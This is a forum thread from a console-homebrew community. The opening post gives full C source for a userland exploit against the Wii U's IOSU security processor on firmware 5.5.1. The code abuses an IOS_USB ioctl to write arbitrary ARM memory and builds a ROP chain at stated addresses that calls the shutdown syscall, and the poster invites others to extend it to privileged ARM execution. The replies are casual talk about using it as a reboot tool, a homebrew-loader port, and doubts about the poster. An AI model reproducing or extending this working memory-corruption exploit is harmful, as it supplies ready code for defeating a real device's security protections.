1. Hillary_Clinton

    OP Hillary_Clinton Member
    Newcomer

    Joined:
    Apr 23, 2016
    Messages:
    23
    Country:
    United States
    IOSU kernel exploit demonstrated here. This is just for people who would like to experiment inside IOSU. You can ignore the text below; it's old.

    Hi guys. Below is an implementation of the userland IOSU exploit on the wiki. It demonstrates a simple ROP chain which will call the shutdown syscall from within IOS_USB and restart your console. (5.5.1 only.) I'm posting this here in the hope that someone might build on this and get privileged execution on the ARM, perhaps by implementing the IOS_CreateThread exploit that is detailed on the wiki, and then share it publicly.

    How this works is described in detail on the wiki but you might like to know that the ROP chain overwrites the return address for the subroutine at 0x1011D968. The return address is at 0x1016AD40. The thread's stack is within the range [0x1015AE50, 0x1016AE50). You might also like to know that MEM1 is mapped R/W on the PPC side at 0xF4000000 and on the ARM side at 0x00000000.

    Updated code here. The rest of the old post:

    The trouble I'm having right now is I am unable to construct a larger ROP chain without it being overwritten between calls to write32. I've tried lots of different ways of moving the stack pointer around but I haven't had much luck. And of course I know there are people who have already achieved privileged execution on the ARM, but this is for the people who are waiting.

    Here's what I have.

    loader.c:
    Code:
    #include "loader.h"
    
    void _start()
    {
        /* Load a good stack */
        asm(
            "lis %r1, 0x1ab5 ;"
            "ori %r1, %r1, 0xd138 ;"
        );
    
        unsigned int coreinit_handle;
        OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle);
    
        void(*_Exit)();
        OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit);
    
        void(*OSSleepTicks)(long long x);
        OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks);
    
        int(*IOS_Open)(char *path, unsigned int mode);
        OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open);
    
        int(*IOS_Close)(int fd);
        OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close);
    
        int du0h = IOS_Open("/dev/uhs/0", 0);
    
        //int ret = write32(du0h, 0x1016BE50 - 0xF0, 0x1012EE5C); // reset syscall
    
    #define CHAIN_START 0x1016AD40
    #define SHUTDOWN 0x1012EE4C
    #define SIMPLE_RETURN 0x101014E4
    
        int ret;
    
        ret = write32(du0h, CHAIN_START + 0x4, SIMPLE_RETURN);
        ret = write32(du0h, CHAIN_START + 0x8, SHUTDOWN);
    
        // the following line will trigger the ROP chain
        ret = write32(du0h, CHAIN_START, SIMPLE_RETURN);
    
        IOS_Close(du0h);
    
        _Exit();
    
        while (1);
    }
    
    int write32(int dev_uhs_0_handle, int arm_addr, int val) {
    
        unsigned int coreinit_handle;
        OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle);
    
        int(*IOS_Ioctl)(int fd, unsigned int request, void *input_buffer,
            unsigned int input_buffer_len, void *output_buffer, unsigned int output_buffer_len);
        void(*DCFlushRange)(void *addr, unsigned int len);
        void(*DCInvalidateRange)(void *addr, unsigned int len);
        void(*OSSleepTicks)(long long x);
        OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl);
        OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
        OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
        OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks);
    
        int* pretend_root_hub = (int*)0xF5003ABC;
        int *ayylmao = (int*)0xF4500000;
    
        ayylmao[8] = (int)ayylmao - 0xF4000000;
        ayylmao[5] = 1;
        ayylmao[520] = arm_addr - 24; // the address to be overwritten, minus 24 bytes.
    
        pretend_root_hub[33] = (int)ayylmao - 0xF4000000;
        pretend_root_hub[78] = 0;
    
        DCFlushRange(pretend_root_hub + 33, 200);
        DCInvalidateRange(pretend_root_hub + 33, 200);
        DCFlushRange(ayylmao, 521 * 4);
        DCInvalidateRange(ayylmao, 521 * 4);
        OSSleepTicks(0x200000);
    
        int root_hub_index = -(0xBEA2C); // gets IOS_USB to read from the middle of MEM1
    
        int request_buffer[] = { root_hub_index, val };
        int output_buffer[32];
        int ret = IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
        return ret;
    }
    loader.h:
    Code:
    #ifndef LOADER_H
    #define LOADER_H
    
    #include "../../../libwiiu/src/coreinit.h"
    #include "../../../libwiiu/src/socket.h"
    #include "../../../libwiiu/src/uhs.h"
    #include "../../../libwiiu/src/types.h"
    
    /* Application start */
    void _start();
    int write32(int, int, int);
    
    #endif /* LOADER_H */
    
     
    Last edited by Hillary_Clinton, Oct 14, 2016
    Azel, N28582R, Lankbald and 38 others like this.
  2. Filo97

    Filo97 Pink = Best colour
    Member

    Joined:
    Oct 8, 2015
    Messages:
    4,079
    Country:
    Italy
    wish so much i could have this homebrew, sometimes rebooting my console is the only thing i want to do.
     
    frogboy, lembi2001 and Subtle Demise like this.
  3. thisisallowed

    thisisallowed 中国御宅族
    Member

    Joined:
    Oct 8, 2015
    Messages:
    621
    Country:
    China
    But it reboots it USING IOSU!!!!111
     
  4. Deleted User

    Deleted User Newbie

    inb4 spam posts

    TAKE NOTE PEOPLE: THIS IS NOT AN IOSU EXPLOIT!
    It demonstrates code execution on the IOSU processor that can eventually lead to a kernel attack on the IOSU, but right now all it does is cold-boot (I think?) your console.
    It is like Browserhax - useful for basic stuff but you want a kernel exploit in order to have backups, HBL and extended memory access.
     
  5. thisisallowed

    thisisallowed 中国御宅族
    Member

    Joined:
    Oct 8, 2015
    Messages:
    621
    Country:
    China
    You can't use this at all, pretty much.
    You need to use the keksploit to do anything. Other than rebooting.
     
  6. Voxel

    Voxel GBAtemp Guru
    Member

    Joined:
    Jun 27, 2015
    Messages:
    5,361
    Country:
    United Kingdom
    Huh, neat; this actually reboots my Wii U! Don't think I would use it in everyday use, but good job demonstrating Userland IOSU access. :)
     
    AHP_person likes this.
  7. Filo97

    Filo97 Pink = Best colour
    Member

    Joined:
    Oct 8, 2015
    Messages:
    4,079
    Country:
    Italy
    can i have a .elf of this? there are times when i just want to reboot console
     
  8. Voxel

    Voxel GBAtemp Guru
    Member

    Joined:
    Jun 27, 2015
    Messages:
    5,361
    Country:
    United Kingdom
    I don't think you can compile it as .elf, but I have the .mp4 (which is probably faster to execute anyway) if you want that.
     
  9. Filo97

    Filo97 Pink = Best colour
    Member

    Joined:
    Oct 8, 2015
    Messages:
    4,079
    Country:
    Italy
    no, thanks
     
  10. Voxel

    Voxel GBAtemp Guru
    Member

    Joined:
    Jun 27, 2015
    Messages:
    5,361
    Country:
    United Kingdom
    Why do you want the .elf then? Is it just so it matches with your collection of other elf files?
     
    leerz likes this.
  11. Filo97

    Filo97 Pink = Best colour
    Member

    Joined:
    Oct 8, 2015
    Messages:
    4,079
    Country:
    Italy
    no, it's because sometimes i just don't feel like leaving hbl open in RAM while playing games like super mario maker or anything that goes online
     
  12. Deleted User

    Deleted User Newbie

    If you want an HBL port (may or may not work) I might try this now. Just let me try the userland version on my console first...
     
  13. Filo97

    Filo97 Pink = Best colour
    Member

    Joined:
    Oct 8, 2015
    Messages:
    4,079
    Country:
    Italy
    yay!
     
  14. Deleted User

    Deleted User Newbie

    HBL port complete (it actually worked on my first build, that's never happened before...)
    Run this file using HBL - it can be streamed via wiiload, SendELF or can be placed inside the sd:/wiiu/apps/iosu-reboot/ folder on your SD Card.

    Enjoy rebooting your console I guess...? (I had to zip it, GBATemp wouldn't let me upload the raw ELF)

    @QuarkTheAwesome does this mean that we can add auto-rebooting to an exception handler? (You mentioned being able to return to the main thread before, but with limitations I can't remember).
     

    Attached Files:

    Last edited Oct 8, 2016
  15. Filo97

    Filo97 Pink = Best colour
    Member

    Joined:
    Oct 8, 2015
    Messages:
    4,079
    Country:
    Italy
    thx
     
  16. Cyan

    Cyan GBATemp's lurking knight
    Former Staff

    Joined:
    Oct 27, 2002
    Messages:
    23,155
    Country:
    France
    Go into Settings and exit. It soft-reboots the console when you exit and clear the hacks/HBL from memory.
     
  17. Filo97

    Filo97 Pink = Best colour
    Member

    Joined:
    Oct 8, 2015
    Messages:
    4,079
    Country:
    Italy
    ah so kinda like 3ds right?
     
    FlappyFalco likes this.
  18. Cyan

    Cyan GBATemp's lurking knight
    Former Staff

    Joined:
    Oct 27, 2002
    Messages:
    23,155
    Country:
    France
    I guess the HBL version he posted will be faster than loading/exiting the settings menu ;)

    @CreeperMario :
    maybe you could include your sources to compile it for HBL?
    it's just a makefile?


    I Added it to wikitemp.
     
  19. Phantom64

    Phantom64 Banned
    Banned

    Joined:
    Aug 18, 2015
    Messages:
    581
    Country:
    Saint Kitts and Nevis
    At this point i am waiting for a IOSU kernel exploit from Donald Trump.

    This is nosense. Someone called Hillary Clinton, registered today, released something quite hacky. Suspicious
     
    supermario18, Pachee, Froz and 9 others like this.
  20. QuarkTheAwesome

    QuarkTheAwesome Working for Hugs
    Member

    Joined:
    Apr 19, 2015
    Messages:
    915
    Country:
    Australia
    Awesome to see! I hope this doesn't mean you're giving up on kernel...
    Sorry I was less help lately, ARM ROP is tough to get my head around :3

    @CreeperMario, you'll have to explain that differently since I'm not really sure what you mean. The work I did allowed homebrew apps to run exception handlers on their main threads (albeit with screwed-up stacks) which is much less restrictive than the default behavior. Not sure how it ties in here.

    (Also I seem to have stopped getting tag notifications. Hrm.)
     
Draft saved Draft deleted